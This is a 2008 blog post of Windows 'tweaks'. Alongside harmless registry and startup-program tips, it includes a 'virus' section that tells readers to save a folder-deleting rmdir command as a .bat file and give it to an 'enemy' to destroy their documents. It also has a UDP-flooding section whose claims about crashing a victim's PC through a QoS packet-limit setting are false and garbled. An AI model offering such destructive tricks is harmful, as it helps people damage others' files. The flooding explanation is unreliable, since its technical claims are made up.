Thursday, June 19, 2008

VARIOUS IMPORTANT AND INTERESTING TWEAKS !

AMISAUV<< :

1.Disable CD burning
Exciting, isn't it?
The user can't burn any CDs by this trick.
This restriction will disable the use of the inbuilt CD recording functions of Windows.
Open your registry and follow this path: HKEY_CURRENT_USER>Software>Microsoft>Windows>Current Version>Policies>Explorer andcreate this key: "NoCDBurning"
and set its value to 1.
Close you registry and logout/restart your system for the change to take the effect.

2.CREATING A VIRUS
HERE'S A WAY I FOUND TO DELETE THE MY DOCUMENTS FOLDER OF UR ENEMY OR JUST 4 FUN.
HERE'S WHAT U SHOULD DO.
OPEN NOTEPAD AND COPY-PASTE THE FOLLOWING CODE IN IT.

rmdir C:\Documents and Settings \S\Q.

THEN SAVE THE FILE WITH WHATEVER NAME U LIKE BUT BE SURE TO SAVE IT AS A .BAT FILE.
I MEAN SAVE IT LIKE MYVIRUS.BAT.IT SHOULD HAVE THE ENDING AS .BAT.
NOW IF U GIVE THIS TO SOMEONE AND IF HE RUNS THIS PROGRAM THEN HIS MY DOCUMENT FOLDER WILL BE DELETED.

3.crash other machines using UDP flooders..
windows OS has an outstanding packet limit......
packets are data packs that constitute the internet traffic......
if the no of packets recieved at a time exceeds a particular limit, the operating system crashes..
standard package limit for windows and contemporary operating systems is 65535....
normal internet traffic does not constitute more than 600 packets at a time unless bandwidth is exceptionally high........
however if more than 65535 packets could be sent at a time the target pc crashes at once..this process is called UDP flooding (udp being user data protocols)..........
systems upto win '98 are vulnerable to these kind of attacks by default.........but the higher versions of windows have a built in packet limiter as a protection against UDP flooding.


Inorder to crash a victims pc all u need to do is to gain access to the pc and change the outstanding package limit to a number greater than 65535.........

steps to access the package console.......
in case of win xp..............
1. type gpedit.msc in run...
2. on the left menu double click administrative templates.
3. network==> qos package scheduler==> limit outstanding packets..

double click on limit outstanding packets and choose enable.........this displays the default packet limit.........reedit it to a value much higher than the original one.......this done u r ready to attack....


4.Control Programs That Run at Startup

The best way to prevent a program from running at Startup, is to check the program's own options for a way to prevent this.
Most good quality programs will provide an option for this.


If you can't find the option there,
click Start, Run and enter MSCONFIG.
Go to the Startup tab, and uncheck the item there.
This method is not always 100% successful. An example is a program that you do use, but you don't want running automatically.
Some programs will check to see if the program's own options say it should run at Startup.
If the program thinks its supposed to load at startup, it will re-create the autorun entry.

No comments: